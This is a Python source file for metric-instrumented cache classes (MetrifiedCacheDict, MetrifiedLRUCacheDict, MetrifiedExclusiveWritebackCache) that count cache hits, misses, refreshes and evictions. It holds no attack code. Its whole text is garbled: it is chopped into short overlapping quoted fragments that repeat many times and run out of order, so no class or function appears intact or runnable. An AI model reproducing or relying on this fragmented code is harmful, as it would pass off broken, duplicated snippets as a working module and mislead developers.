refresh", "None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None):", "= cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes =", "value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] = None,", "else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits')", "tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter = value_getter", "None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try:", "ticked with time value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter,", "tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter def", "= evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is not None: self.evictions.runtime(+1)", "cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss =", "stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric]", "= value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter,", "cache_hits if entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if", "= ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] =", "value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes =", "tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric]", "__getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item)", "if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size)", "refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1)", "cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs):", "will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval:", "updated with +1 each time there's a cache refresh :param how_long_refresh_takes: a metric", "logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param cache_hits: a counter", "cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions:", "None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None,", "__slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric]", "each time there's a cache miss :param refreshes: a metric that will be", "metrics! :param cache_hits: a counter metric that will be updated with +1 each", "= None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item):", "how_long_refresh_takes def evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item):", "def evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if", "if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K,", "how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1)", "self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict", "cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes", "not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item in self.in_cache: if", "import time import typing as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from", "import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import", "def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric]", "ExclusiveWritebackCache from satella.coding.typing import K, V from .. import Metric from ..metric_types.callable import", "counter metric that will be updated with +1 each time there's a cache", "\"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size:", "be updated with +1 each time there's a cache miss :param refreshes: a", "will be updated with +1 each time there's a cache miss :param refreshes:", "__init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] =", "import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__)", "cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if", "def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None,", "if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K,", "= None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs)", "from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K,", "class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] =", "evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item):", "self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if", "hit :param cache_miss: a counter metric that will be updated with +1 each", "cache hit :param cache_miss: a counter metric that will be updated with +1", "K, V from .. import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import", "self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param", "class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits: a counter metric", "that will be updated with +1 each time there's a cache hit :param", "took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric]", "cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item):", "time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] =", "self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]):", "super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1)", "tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs): if", "tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes:", "each time there's a cache hit :param cache_miss: a counter metric that will", "from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict", "+1 each time there's a cache refresh :param how_long_refresh_takes: a metric that will", "entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1)", "None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter", "how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return", "satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from .. import", "self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter,", "= cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self,", "value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits =", "expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes", "from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger", "= None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes:", "stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100,", "expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss", "a cache refresh :param how_long_refresh_takes: a metric that will be ticked with time", "= cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item):", ".. import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin", "V from .. import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric", "value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes", "= 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] =", "how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss =", "return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits:", "if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes:", "if self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if", "None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None,", "finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval,", "self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits:", "a cache miss :param refreshes: a metric that will be updated with +1", "self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits:", "**kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting is not", "cache_miss: a counter metric that will be updated with +1 each time there's", "max_size: int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes:", "be updated with +1 each time there's a cache refresh :param how_long_refresh_takes: a", "time there's a cache refresh :param how_long_refresh_takes: a metric that will be ticked", "value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss:", "super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss", "refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter", "super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss =", "int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric]", "logging import time import typing as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache", "value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic,", "if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\"", "that will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval: float,", "None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter =", "import K, V from .. import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter", "cache_hits: a counter metric that will be updated with +1 each time there's", "with +1 each time there's a cache miss :param refreshes: a metric that", "time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes =", "class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param cache_hits: a counter metric", "that will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval,", "= logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param cache_hits: a", "import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from .. import Metric", "expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] =", "= self.get_queue_length() def __getitem__(self, item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else:", "value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes:", "not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else:", "if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval,", "self.get_queue_length() def __getitem__(self, item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else: if", "__getitem__(self, item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1)", "will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter,", "def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int", "LRUCacheDict with metrics! :param cache_hits: a counter metric that will be updated with", "..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with", "\"\"\" A LRUCacheDict with metrics! :param cache_hits: a counter metric that will be", "self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if", "time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions", "CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class", "self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ =", "import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\"", "= None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] =", "..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from ..metric_types.measurable_mixin import MeasurableMixin logger =", "tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if", "('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None,", "a counter metric that will be updated with +1 each time there's a", "time there's a cache miss :param refreshes: a metric that will be updated", "V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss:", "= None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally:", "+1 each time there's a cache miss :param refreshes: a metric that will", "with +1 each time there's a cache hit :param cache_miss: a counter metric", "cache refresh :param how_long_refresh_takes: a metric that will be ticked with time value_getter", "+1 each time there's a cache hit :param cache_miss: a counter metric that", "super().__getitem__(item) class MetrifiedLRUCacheDict(LRUCacheDict[K, V]): \"\"\" A LRUCacheDict with metrics! :param cache_hits: a counter", "typing as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K,", "= None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting", "metric that will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval:", "= refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1)", "= cache_hits if entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item):", "def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return", "cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes", "self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor,", "if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def", "cache miss :param refreshes: a metric that will be updated with +1 each", "evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict()", "tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return", "with time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic,", "updated with +1 each time there's a cache miss :param refreshes: a metric", "cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric]", "import logging import time import typing as tp from satella.coding.structures import CacheDict, LRUCacheDict,", "metric that will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval,", "default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None,", "cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes:", "None, **kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally:", "there's a cache refresh :param how_long_refresh_takes: a metric that will be ticked with", "import typing as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import", "= None, **kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item)", "time import typing as tp from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing", "there's a cache hit :param cache_miss: a counter metric that will be updated", "self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes", "self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss',", "time value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None,", "\"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] =", "**kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting is not None: entries_waiting.callable", "None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if", "will be updated with +1 each time there's a cache hit :param cache_miss:", "= how_long_refresh_takes def evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self,", "self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self,", "tp.Optional[Metric] = None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin]", "there's a cache miss :param refreshes: a metric that will be updated with", "value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory,", "def __getitem__(self, item): if item in self.in_cache: if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss:", "self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args,", "a metric that will be updated with +1 each time there's a cache", "return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter =", "float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] =", "took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None,", "value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes", "with time value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter, value_getter_executor=None,", "that will be updated with +1 each time there's a cache miss :param", "value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits:", "self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict() def", "value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval,", "updated with +1 each time there's a cache hit :param cache_miss: a counter", "MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param cache_hits: a counter metric that", "tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args,", "ticked with time value_getter took \"\"\" def __init__(self, stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None,", "None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if item in self.in_cache: if self.cache_hits:", "entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits = cache_hits", "how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits =", "satella.coding.typing import K, V from .. import Metric from ..metric_types.callable import CallableMetric from", "how_long_refresh_takes: a metric that will be ticked with time value_getter took \"\"\" def", "V]): \"\"\" A CacheDict with metrics! :param cache_hits: a counter metric that will", "CacheDict with metrics! :param cache_hits: a counter metric that will be updated with", "cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes", "default_value_factory) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.how_long_refresh_takes = how_long_refresh_takes", "from satella.coding.structures import CacheDict, LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from ..", "if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits", "= None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] =", "= None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits", "will be updated with +1 each time there's a cache refresh :param how_long_refresh_takes:", "if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__", "max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions = evictions", "metric that will be updated with +1 each time there's a cache hit", "self.cache_miss = cache_miss self.cache_hits = cache_hits if entries_waiting is not None: entries_waiting.callable =", "float, expiration_interval: float, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits:", "= cache_miss self.cache_hits = cache_hits if entries_waiting is not None: entries_waiting.callable = self.get_queue_length()", "cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric]", "tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin]", "self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is not None:", "value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory) self.cache_hits = cache_hits", "cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if", "= None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter", "how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter =", "'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting:", "a cache hit :param cache_miss: a counter metric that will be updated with", "refreshes self.how_long_refresh_takes = how_long_refresh_takes def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else:", "from .. import Metric from ..metric_types.callable import CallableMetric from ..metric_types.counter import CounterMetric from", "None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if", ":param cache_miss: a counter metric 